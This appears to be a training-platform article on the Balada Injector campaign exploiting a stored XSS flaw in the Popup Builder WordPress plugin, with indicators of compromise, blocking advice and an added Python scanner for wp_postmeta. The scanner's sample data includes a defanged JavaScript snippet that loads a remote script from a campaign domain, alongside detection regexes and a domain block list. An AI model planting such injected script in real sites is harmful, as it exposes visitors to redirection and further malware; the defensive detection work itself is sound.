Balada Injector malware campaign
Bhumi iTech
Rangestorm, a comprehensive, hands-on and practical cybersecurity training platform used by learners
In recent times, a significant threat has emerged within the realm of WordPress websites in the form of the Balada Injector malware campaign. The campaign exploits a vulnerability in the widely used Popup Builder WordPress plugin, resulting in the compromise of numerous websites. The flaw leveraged in the attacks is tracked as CVE-2023-6000, a cross-site scripting (XSS) vulnerability affecting Popup Builder versions 4.2.3 and older. It was initially disclosed by security researcher Marc Montpas in November 2023 and has since become a focal point for cybercriminals seeking to compromise WordPress sites.
Methodology
A Balada Injector campaign uncovered at the start of the year exploited this vulnerability to infect over 6,700 websites.
Affected Version
New Malware Campaign Found Exploiting Stored XSS in Popup Builder < 4.2.3
Indicators of Compromise
The attackers capitalize on the known vulnerability in the Popup Builder WordPress plugin to inject malicious code into the plugin's Custom JS or CSS section of the WordPress admin interface.
This injected code, stored internally in the wp_postmeta database table, manifests in two variations across infected websites.
Primarily, the injected code is registered as event handlers for a range of Popup Builder plugin events, including 'sgpb-ShouldOpen', 'sgpb-ShouldClose', 'sgpb-WillOpen', 'sgpbDidOpen', 'sgpbWillClose', and 'sgpb-DidClose'. Through this mechanism, the malicious code runs on specific plugin actions, particularly when popups open or close.
Certain iterations of the injected code incorporate the "hxxp://ttincoming.traveltraffic[.]cc/?traffic" URL as the redirect-url parameter for 'contact-form-7' popups.
The injected code retrieves a further malicious snippet from an external source and embeds it into the webpage head, where the browser executes it. This gives the attackers a wide range of possible malicious objectives, many potentially more severe than redirections.
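As an added example (not part of the original article), the following Python scans Popup Builder custom-JS and option values pulled from wp_postmeta for the pattern described above: handlers on the sgpb-* events that load a remote script into the page head, off-site redirect-url values, and the two campaign domains named on this page. The sample rows and meta_key names are constructed, and the site's own hostname is assumed to be example.com.

```python
import re

# Popup Builder events the article reports being abused as handler hook points.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
               "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose")
# Campaign domains named in the article (refanged: "[.]" -> ".").
IOC_DOMAINS = frozenset({"ttincoming.traveltraffic.cc", "host.cloudsonicwave.com"})

# Typical ways JavaScript appends a remote <script> to the document head.
HEAD_INJECT_RE = re.compile(
    r"createElement\s*\(\s*['\"]script['\"]|document\.head|"
    r"getElementsByTagName\s*\(\s*['\"]head['\"]", re.I)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def refang(text):
    """Undo common defanging so IoC-style text and raw DB text match alike."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def analyze_custom_js(meta_value, site_host):
    """Return findings for one Popup Builder custom-JS/options value."""
    text = refang(meta_value)
    findings = []
    hooked = [e for e in SGPB_EVENTS if e in text]
    hosts = {h.lower().rstrip(".") for h in URL_HOST_RE.findall(text)}
    foreign = sorted(h for h in hosts if h != site_host.lower())
    known = sorted(h for h in foreign if h in IOC_DOMAINS)
    if known:
        findings.append("known Balada domain: " + ", ".join(known))
    if hooked and foreign and HEAD_INJECT_RE.search(text):
        findings.append("sgpb handler (%s) injects remote script from %s"
                        % (", ".join(hooked), ", ".join(foreign)))
    if "redirect-url" in text and foreign:
        findings.append("popup redirect-url points off-site: " + ", ".join(foreign))
    return findings

def scan_postmeta(rows, site_host):
    """rows: iterable of (meta_id, post_id, meta_key, meta_value); returns {meta_id: findings}."""
    results = {}
    for meta_id, _post_id, _meta_key, meta_value in rows:
        findings = analyze_custom_js(meta_value, site_host)
        if findings:
            results[meta_id] = findings
    return results

# Constructed sample rows (meta_key names are placeholders, not real plugin keys).
SAMPLE_ROWS = [
    (1, 10, "sg_popup_custom_js",
     "document.addEventListener('sgpb-DidOpen',function(){console.log('opened');});"),
    (2, 11, "sg_popup_custom_js",
     "document.addEventListener('sgpb-ShouldOpen',function(){var s=document.createElement('script');"
     "s.src='hxxp://host.cloudsonicwave[.]com/x.js';document.head.appendChild(s);});"),
    (3, 12, "sg_popup_options",
     "a:1:{s:12:\"redirect-url\";s:45:\"hxxp://ttincoming.traveltraffic[.]cc/?traffic\";}"),
]

if __name__ == "__main__":
    for meta_id, findings in scan_postmeta(SAMPLE_ROWS, "example.com").items():
        print(meta_id, findings)
```

Row 1 is a benign handler on a Popup Builder event and produces no finding; only rows that reach off-site, and in particular the two named domains, are reported.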
Defensive Measures
1) Defending against Balada Injection attacks requires WordPress site admins to update themes and plugins to their latest version, and uninstall products that are no longer supported or needed on the website.
2) Keeping the number of active plugins on a WordPress site as small as possible reduces the attack surface and minimizes the risk of breaches from automated scripts.
3) The attacks originate from the domains "ttincoming.traveltraffic[.]cc" and "host.cloudsonicwave[.]com," so blocking these two is recommended.
In short, WordPress site admins are advised to update themes and plugins to their latest versions promptly and to uninstall unsupported or unnecessary plugins, which reduces the attack surface and minimizes the risk of breaches.